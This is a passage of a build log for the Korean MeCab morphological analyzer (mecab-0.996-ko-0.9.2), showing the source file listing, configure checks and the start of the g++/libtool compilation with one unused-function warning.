pe/dicrc\nmecab-0.996-ko-0.9.2/tests/chartype/dic.csv\nmecab-0.996-ko-0.9.2/tests/chartype/test\nmecab-0.996-ko-0.9.2/tests/chartype/char.def\nmecab-0.996-ko-0.9.2/test
s/chartype/matrix.def\nmecab-0.996-ko-0.9.2/tests/chartype/test.gld\nmecab-0.996-ko-0.9.2/tests/run-dics.sh\nmecab-0.996-ko-0.9.2/tests/ngram/\nmecab-0.996-ko-0.9.2/tests/ngram/unk.def\nmecab-0.996-ko-0.9.2/tests/ngram/dicrc\nmecab-0.996-ko-0.9.2/tests/ngram/dic.csv\nmecab-0.996-ko-0.9.2/tests/ngram/test\nmecab-0.996-ko-0.9.2/tests/ngram/char.def\nmecab-0.996-ko-0.9.2/tests/ngram/matrix.def\nmecab-0.996-ko-0.9.2/tests/ngram/test.gld\nmecab-0.996-ko-0.9.2/tests/Makefile.in\nmecab-0.996-ko-0.9.2/ltmain.sh\nmecab-0.996-ko-0.9.2/config.rpath\nmecab-0.996-ko-0.9.2/config.h.in\nmecab-0.996-ko-0.9.2/mecabrc.in\nmecab-0.996-ko-0.9.2/GPL\nmecab-0.996-ko-0.9.2/Makefile.train\nmecab-0.996-ko-0.9.2/ChangeLog\nmecab-0.996-ko-0.9.2/install-sh\nmecab-0.996-ko-0.9.2/AUTHORS\nmecab-0.996-ko-0.9.2/doc/\nmecab-0.996-ko-0.9.2/doc/bindings.html\nmecab-0.996-ko-0.9.2/doc/posid.html\nmecab-0.996-ko-0.9.2/doc/unk.html\nmecab-0.996-ko-0.9.2/doc/learn.html\nmecab-0.996-ko-0.9.2/doc/format.html\nmecab-0.996-ko-0.9.2/doc/libmecab.html\nmecab-0.996-ko-0.9.2/doc/mecab.css\nmecab-0.996-ko-0.9.2/doc/feature.html\nmecab-0.996-ko-0.9.2/doc/Makefile.am\nmecab-0.996-ko-0.9.2/doc/soft.html\nmecab-0.996-ko-0.9.2/doc/en/\nmecab-0.996-ko-0.9.2/doc/en/bindings.html\nmecab-0.996-ko-0.9.2/doc/dic-detail.html\nmecab-0.996-ko-0.9.2/doc/flow.png\nmecab-0.996-ko-0.9.2/doc/mecab.html\nmecab-0.996-ko-0.9.2/doc/index.html\nmecab-0.996-ko-0.9.2/doc/result.png\nmecab-0.996-ko-0.9.2/doc/doxygen/\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_a.png\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_eval.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Tagger-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/functions_vars.html\nmecab-0.996-ko-0.9.2/doc/doxygen/doxygen.css\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_r.gif\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Lattice.html\nmecab-0.996-ko-0.9.2/doc/doxygen/functions.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Tagger.html\nmecab-0.996-ko-0.9.2/doc/doxygen/mecab_8h_source.html
\nmecab-0.996-ko-0.9.2/doc/doxygen/tabs.css\nmecab-0.996-ko-0.9.2/doc/doxygen/nav_f.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_b.png\nmecab-0.996-ko-0.9.2/doc/doxygen/globals.html\nmecab-0.996-ko-0.9.2/doc/doxygen/nav_h.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_h.png\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Model.html\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_func.html\nmecab-0.996-ko-0.9.2/doc/doxygen/closed.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_l.gif\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__path__t-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/functions_func.html\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_type.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Lattice-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__node__t.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespacemembers_func.html\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_s.png\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__dictionary__info__t-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespacemembers_type.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Model-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__dictionary__info__t.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespaces.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespacemembers.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespaceMeCab.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__path__t.html\nmecab-0.996-ko-0.9.2/doc/doxygen/files.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__node__t-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/index.html\nmecab-0.996-ko-0.9.2/doc/doxygen/annotated.html\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_defs.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classes.html\nmecab-0.996-ko-0.9.2/doc/doxygen/mecab_8h-source.html\nmecab-0.996-ko-0.9.2/doc/doxygen/doxygen.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_b.gif\nmecab-0.996-ko-0.9.2/doc/doxygen/bc_s.png\nmecab-0.996-ko-0.9.2/doc/doxygen/open.png\nmecab-0.996-ko-0.9.2/doc/doxygen/mecab_8h.html\nmecab-0.996-ko-0.9.2/doc/dic.html\nmeca
b-0.996-ko-0.9.2/doc/partial.html\nmecab-0.996-ko-0.9.2/doc/feature.png\nmecab-0.996-ko-0.9.2/doc/Makefile.in\nmecab-0.996-ko-0.9.2/missing\nmecab-0.996-ko-0.9.2/BSD\nmecab-0.996-ko-0.9.2/NEWS\nmecab-0.996-ko-0.9.2/mkinstalldirs\nmecab-0.996-ko-0.9.2/src/\nmecab-0.996-ko-0.9.2/src/dictionary.h\nmecab-0.996-ko-0.9.2/src/writer.h\nmecab-0.996-ko-0.9.2/src/utils.h\nmecab-0.996-ko-0.9.2/src/string_buffer.cpp\nmecab-0.996-ko-0.9.2/src/tokenizer.cpp\nmecab-0.996-ko-0.9.2/src/make.bat\nmecab-0.996-ko-0.9.2/src/mecab.h\nmecab-0.996-ko-0.9.2/src/freelist.h\nmecab-0.996-ko-0.9.2/src/string_buffer.h\nmecab-0.996-ko-0.9.2/src/learner_tagger.h\nmecab-0.996-ko-0.9.2/src/dictionary_compiler.cpp\nmecab-0.996-ko-0.9.2/src/eval.cpp\nmecab-0.996-ko-0.9.2/src/mecab-system-eval.cpp\nmecab-0.996-ko-0.9.2/src/darts.h\nmecab-0.996-ko-0.9.2/src/param.h\nmecab-0.996-ko-0.9.2/src/char_property.h\nmecab-0.996-ko-0.9.2/src/learner_node.h\nmecab-0.996-ko-0.9.2/src/mecab-dict-gen.cpp\nmecab-0.996-ko-0.9.2/src/mecab-dict-index.cpp\nmecab-0.996-ko-0.9.2/src/winmain.h\nmecab-0.996-ko-0.9.2/src/thread.h\nmecab-0.996-ko-0.9.2/src/context_id.cpp\nmecab-0.996-ko-0.9.2/src/Makefile.am\nmecab-0.996-ko-0.9.2/src/connector.h\nmecab-0.996-ko-0.9.2/src/common.h\nmecab-0.996-ko-0.9.2/src/dictionary_rewriter.cpp\nmecab-0.996-ko-0.9.2/src/Makefile.msvc.in\nmecab-0.996-ko-0.9.2/src/dictionary_rewriter.h\nmecab-0.996-ko-0.9.2/src/feature_index.h\nmecab-0.996-ko-0.9.2/src/iconv_utils.cpp\nmecab-0.996-ko-0.9.2/src/char_property.cpp\nmecab-0.996-ko-0.9.2/src/mecab-test-gen.cpp\nmecab-0.996-ko-0.9.2/src/tagger.cpp\nmecab-0.996-ko-0.9.2/src/mecab-cost-train.cpp\nmecab-0.996-ko-0.9.2/src/learner.cpp\nmecab-0.996-ko-0.9.2/src/dictionary.cpp\nmecab-0.996-ko-0.9.2/src/lbfgs.cpp\nmecab-0.996-ko-0.9.2/src/ucs.h\nmecab-0.996-ko-0.9.2/src/writer.cpp\nmecab-0.996-ko-0.9.2/src/learner_tagger.cpp\nmecab-0.996-ko-0.9.2/src/lbfgs.h\nmecab-0.996-ko-0.9.2/src/libmecab.cpp\nmecab-0.996-ko-0.9.2/src/tokenizer.h\nmecab-0.996-ko-0.9.2/sr
c/mecab.cpp\nmecab-0.996-ko-0.9.2/src/utils.cpp\nmecab-0.996-ko-0.9.2/src/dictionary_generator.cpp\nmecab-0.996-ko-0.9.2/src/param.cpp\nmecab-0.996-ko-0.9.2/src/context_id.h\nmecab-0.996-ko-0.9.2/src/mmap.h\nmecab-0.996-ko-0.9.2/src/viterbi.h\nmecab-0.996-ko-0.9.2/src/viterbi.cpp\nmecab-0.996-ko-0.9.2/src/stream_wrapper.h\nmecab-0.996-ko-0.9.2/src/feature_index.cpp\nmecab-0.996-ko-0.9.2/src/nbest_generator.h\nmecab-0.996-ko-0.9.2/src/ucstable.h\nmecab-0.996-ko-0.9.2/src/nbest_generator.cpp\nmecab-0.996-ko-0.9.2/src/iconv_utils.h\nmecab-0.996-ko-0.9.2/src/connector.cpp\nmecab-0.996-ko-0.9.2/src/Makefile.in\nmecab-0.996-ko-0.9.2/src/scoped_ptr.h\nmecab-0.996-ko-0.9.2/Makefile.in\nchecking for a BSD-compatible install... /usr/bin/install -c\nchecking whether build environment is sane... yes\nchecking for a thread-safe mkdir -p... /bin/mkdir -p\nchecking for gawk... no\nchecking for mawk... mawk\nchecking whether make sets $(MAKE)... yes\nchecking for gcc... gcc\nchecking whether the C compiler works... yes\nchecking for C compiler default output file name... a.out\nchecking for suffix of executables... \nchecking whether we are cross compiling... no\nchecking for suffix of object files... o\nchecking whether we are using the GNU C compiler... yes\nchecking whether gcc accepts -g... yes\nchecking for gcc option to accept ISO C89... none needed\nchecking for style of include used by make... GNU\nchecking dependency style of gcc... none\nchecking for g++... g++\nchecking whether we are using the GNU C++ compiler... yes\nchecking whether g++ accepts -g... yes\nchecking dependency style of g++... none\nchecking how to run the C preprocessor... gcc -E\nchecking for grep that handles long lines and -e... /bin/grep\nchecking for egrep... /bin/grep -E\nchecking whether gcc needs -traditional... no\nchecking whether make sets $(MAKE)... (cached) yes\nchecking build system type... x86_64-unknown-linux-gnu\nchecking host system type... 
x86_64-unknown-linux-gnu\nchecking how to print strings... printf\nchecking for a sed that does not truncate output... /bin/sed\nchecking for fgrep... /bin/grep -F\nchecking for ld used by gcc... /usr/bin/ld\nchecking if the linker (/usr/bin/ld) is GNU ld... yes\nchecking for BSD- or MS-compatible name lister (nm)... /usr/bin/nm -B\nchecking the name lister (/usr/bin/nm -B) interface... BSD nm\nchecking whether ln -s works... yes\nchecking the maximum length of command line arguments... 1572864\nchecking whether the shell understands some XSI constructs... yes\nchecking whether the shell understands \"+=\"... yes\nchecking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format... func_convert_file_noop\nchecking how to convert x86_64-unknown-linux-gnu file names to toolchain format... func_convert_file_noop\nchecking for /usr/bin/ld option to reload object files... -r\nchecking for objdump... objdump\nchecking how to recognize dependent libraries... pass_all\nchecking for dlltool... dlltool\nchecking how to associate runtime and link libraries... printf %s\\n\nchecking for ar... ar\nchecking for archiver @FILE support... @\nchecking for strip... strip\nchecking for ranlib... ranlib\nchecking command to parse /usr/bin/nm -B output from gcc object... ok\nchecking for sysroot... no\n./configure: line 7378: /usr/bin/file: No such file or directory\nchecking for mt... no\nchecking if : is a manifest tool... no\nchecking for ANSI C header files... yes\nchecking for sys/types.h... yes\nchecking for sys/stat.h... yes\nchecking for stdlib.h... yes\nchecking for string.h... yes\nchecking for memory.h... yes\nchecking for strings.h... yes\nchecking for inttypes.h... yes\nchecking for stdint.h... yes\nchecking for unistd.h... yes\nchecking for dlfcn.h... yes\nchecking for objdir... .libs\nchecking if gcc supports -fno-rtti -fno-exceptions... no\nchecking for gcc option to produce PIC... -fPIC -DPIC\nchecking if gcc PIC flag -fPIC -DPIC works... 
yes\nchecking if gcc static flag -static works... yes\nchecking if gcc supports -c -o file.o... yes\nchecking if gcc supports -c -o file.o... (cached) yes\nchecking whether the gcc linker (/usr/bin/ld) supports shared libraries... yes\nchecking whether -lc should be explicitly linked in... no\nchecking dynamic linker characteristics... GNU/Linux ld.so\nchecking how to hardcode library paths into programs... immediate\nchecking whether stripping libraries is possible... yes\nchecking if libtool supports shared libraries... yes\nchecking whether to build shared libraries... yes\nchecking whether to build static libraries... yes\nchecking how to run the C++ preprocessor... g++ -E\nchecking for ld used by g++... /usr/bin/ld\nchecking if the linker (/usr/bin/ld) is GNU ld... yes\nchecking whether the g++ linker (/usr/bin/ld) supports shared libraries... yes\nchecking for g++ option to produce PIC... -fPIC -DPIC\nchecking if g++ PIC flag -fPIC -DPIC works... yes\nchecking if g++ static flag -static works... yes\nchecking if g++ supports -c -o file.o... yes\nchecking if g++ supports -c -o file.o... (cached) yes\nchecking whether the g++ linker (/usr/bin/ld) supports shared libraries... yes\nchecking dynamic linker characteristics... (cached) GNU/Linux ld.so\nchecking how to hardcode library paths into programs... immediate\nchecking for library containing strerror... none required\nchecking whether byte ordering is bigendian... no\nchecking for ld used by GCC... /usr/bin/ld\nchecking if the linker (/usr/bin/ld) is GNU ld... yes\nchecking for shared library run path origin... done\nchecking for iconv... yes\nchecking for working iconv... yes\nchecking for iconv declaration... \n extern size_t iconv (iconv_t cd, char * *inbuf, size_t *inbytesleft, char * *outbuf, size_t *outbytesleft);\nchecking for ANSI C header files... (cached) yes\nchecking for an ANSI C-conforming const... yes\nchecking whether byte ordering is bigendian... (cached) no\nchecking for string.h... 
(cached) yes\nchecking for stdlib.h... (cached) yes\nchecking for unistd.h... (cached) yes\nchecking fcntl.h usability... yes\nchecking fcntl.h presence... yes\nchecking for fcntl.h... yes\nchecking for stdint.h... (cached) yes\nchecking for sys/stat.h... (cached) yes\nchecking sys/mman.h usability... yes\nchecking sys/mman.h presence... yes\nchecking for sys/mman.h... yes\nchecking sys/times.h usability... yes\nchecking sys/times.h presence... yes\nchecking for sys/times.h... yes\nchecking for sys/types.h... (cached) yes\nchecking dirent.h usability... yes\nchecking dirent.h presence... yes\nchecking for dirent.h... yes\nchecking ctype.h usability... yes\nchecking ctype.h presence... yes\nchecking for ctype.h... yes\nchecking for sys/types.h... (cached) yes\nchecking io.h usability... no\nchecking io.h presence... no\nchecking for io.h... no\nchecking windows.h usability... no\nchecking windows.h presence... no\nchecking for windows.h... no\nchecking pthread.h usability... yes\nchecking pthread.h presence... yes\nchecking for pthread.h... yes\nchecking for off_t... yes\nchecking for size_t... yes\nchecking size of char... 1\nchecking size of short... 2\nchecking size of int... 4\nchecking size of long... 8\nchecking size of long long... 8\nchecking size of size_t... 8\nchecking for size_t... (cached) yes\nchecking for unsigned long long int... yes\nchecking for stdlib.h... (cached) yes\nchecking for unistd.h... (cached) yes\nchecking for sys/param.h... yes\nchecking for getpagesize... yes\nchecking for working mmap... yes\nchecking for main in -lstdc++... yes\nchecking for pthread_create in -lpthread... yes\nchecking for pthread_join in -lpthread... yes\nchecking for getenv... yes\nchecking for opendir... yes\nchecking whether make is GNU Make... yes\nchecking if g++ supports stl <vector> (required)... yes\nchecking if g++ supports stl <list> (required)... yes\nchecking if g++ supports stl <map> (required)... yes\nchecking if g++ supports stl <set> (required)... 
yes\nchecking if g++ supports stl <queue> (required)... yes\nchecking if g++ supports stl <functional> (required)... yes\nchecking if g++ supports stl <algorithm> (required)... yes\nchecking if g++ supports stl <string> (required)... yes\nchecking if g++ supports stl <iostream> (required)... yes\nchecking if g++ supports stl <sstream> (required)... yes\nchecking if g++ supports stl <fstream> (required)... yes\nchecking if g++ supports template <class T> (required)... yes\nchecking if g++ supports const_cast<> (required)... yes\nchecking if g++ supports static_cast<> (required)... yes\nchecking if g++ supports reinterpret_cast<> (required)... yes\nchecking if g++ supports namespaces (required) ... yes\nchecking if g++ supports __thread (optional)... yes\nchecking if g++ supports template <class T> (required)... yes\nchecking if g++ supports GCC native atomic operations (optional)... yes\nchecking if g++ supports OSX native atomic operations (optional)... no\nchecking if g++ environment provides all required features... yes\nconfigure: creating ./config.status\nconfig.status: creating Makefile\nconfig.status: creating src/Makefile\nconfig.status: creating src/Makefile.msvc\nconfig.status: creating man/Makefile\nconfig.status: creating doc/Makefile\nconfig.status: creating tests/Makefile\nconfig.status: creating swig/version.h\nconfig.status: creating mecab.iss\nconfig.status: creating mecab-config\nconfig.status: creating mecabrc\nconfig.status: creating config.h\nconfig.status: executing depfiles commands\nconfig.status: executing libtool commands\nconfig.status: executing default commands\nmake all-recursive\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nMaking all in src\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o viterbi.lo viterbi.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c viterbi.cpp -fPIC -DPIC -o .libs/viterbi.o\nIn file included from \u001b[01m\u001b[Kviterbi.cpp:14:0\u001b[m\u001b[K:\n\u001b[01m\u001b[Kparam.h:30:13:\u001b[m\u001b[K \u001b[01;35m\u001b[Kwarning: \u001b[m\u001b[K'\u001b[01m\u001b[KTarget {anonymous}::lexical_cast(Source) [with Target = std::__cxx11::basic_string<char>; Source = std::__cxx11::basic_string<char>]\u001b[m\u001b[K' defined but not used [\u001b[01;35m\u001b[K-Wunused-function\u001b[m\u001b[K]\n std::string \u001b[01;35m\u001b[Klexical_cast<std::string, std::string>\u001b[m\u001b[K(std::string arg) {\n \u001b[01;35m\u001b[K^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\u001b[m\u001b[K\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c viterbi.cpp -o viterbi.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o tagger.lo tagger.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tagger.cpp -fPIC -DPIC -o .libs/tagger.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tagger.cpp -o tagger.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o utils.lo utils.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c utils.cpp -fPIC -DPIC -o .libs/utils.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c utils.cpp -o utils.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o eval.lo eval.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c eval.cpp -fPIC -DPIC -o .libs/eval.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c eval.cpp -o eval.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o iconv_utils.lo iconv_utils.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c iconv_utils.cpp -fPIC -DPIC -o .libs/iconv_utils.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c iconv_utils.cpp -o iconv_utils.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary_rewriter.lo dictionary_rewriter.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_rewriter.cpp -fPIC -DPIC -o .libs/dictionary_rewriter.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_rewriter.cpp -o dictionary_rewriter.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary_generator.lo dictionary_generator.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_generator.cpp -fPIC -DPIC -o .libs/dictionary_generator.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_generator.cpp -o dictionary_generator.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary_compiler.lo dictionary_compiler.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_compiler.cpp -fPIC -DPIC -o .libs/dictionary_compiler.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_compiler.cpp -o dictionary_compiler.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o context_id.lo context_id.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c context_id.cpp -fPIC -DPIC -o .libs/context_id.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c context_id.cpp -o context_id.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o connector.lo connector.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c connector.cpp -fPIC -DPIC -o .libs/connector.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c connector.cpp -o connector.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o nbest_generator.lo nbest_generator.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c nbest_generator.cpp -fPIC -DPIC -o .libs/nbest_generator.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c nbest_generator.cpp -o nbest_generator.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o writer.lo writer.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c writer.cpp -fPIC -DPIC -o .libs/writer.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c writer.cpp -o writer.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o string_buffer.lo string_buffer.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c string_buffer.cpp -fPIC -DPIC -o .libs/string_buffer.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. 
-DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c string_buffer.cpp -o string_buffer.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o param.lo param.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c param.cpp -fPIC -DPIC -o .libs/param.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c param.cpp -o param.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o tokenizer.lo tokenizer.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tokenizer.cpp -fPIC -DPIC -o .libs/tokenizer.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tokenizer.cpp -o tokenizer.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o char_property.lo char_property.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c char_property.cpp -fPIC -DPIC -o .libs/char_property.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 